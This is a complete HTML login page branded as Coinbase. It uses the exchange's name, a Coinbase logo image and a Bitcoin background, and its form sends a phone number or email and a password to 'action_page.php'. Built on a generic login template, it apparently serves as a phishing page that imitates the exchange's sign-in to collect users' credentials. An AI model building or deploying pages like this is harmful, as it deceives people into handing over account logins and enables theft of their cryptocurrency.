<!Doctype html>
<html>
	<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"></head>
	<title>Coinbase</title>
     <style type="text/css">
	body {background-image: url ("Bitcoin.jpg");}
	  form {
        border: 3px solid #e1dada;
    }
	a:link {text-decoration:none;}
  	a {color:#9999c1 }
	 input[type=text],    input[type=password]   {
        width: 100%;
        padding: 12px 20px;
        margin: 8px 0;
        display: inline-block;
        border: 1px solid #ccc;
        box-sizing: border-box
   }
	 button   {
     background-color: #2454ab;
     color: white;
     padding: 14px 20px;
     margin: 8px 0;
     border: none;
     cursor: pointer;
     width: 100%;
   }
	button:hover {
opacity: 0.8;
   }
	 .cancelbtn   {
     width: auto
     padding: 10px 18px;
     background-color: #f44336
   }
	 .imgcontainer   {
     text-align: center;
     margin: 24px 0 12px 0;
   }
	img.avatar {
     width: 40%;
     border-radius: 50%;
   }
	.container   {
     padding: 16px;
   }
	 @media screen and(max-width: 300px) {
 span.psw   {
     display: block;
     float: none;
   }
     .cancelbtn   {
     width: 100%;
   }
}
     </style>

	<form action="action_page.php" method="post">
	  <div class="imgcontainer">
	  <img src="Coinbase.jpg" alt="Avatar" class="avatar">
	</div>
	
	<div class="container">
	  <label for="uname"><b>Phone number/Email</b></label>
	  <input type="text" placeholder="Enter Pnone number/Email" name="uname" required>
	
	  <label for="psw"><b>Password</b></label>
	  <input type="password" placeholder="Enter Password" name="psw" required>

	  <button type="submit">Login</button>
	<label>
                </div>

               <div class="container" style="backgroung-color:#f1f11f1">
	<span class="psw">Forgot <a href="Index.html">password?</a></span>
               </div>

	</form>
</html>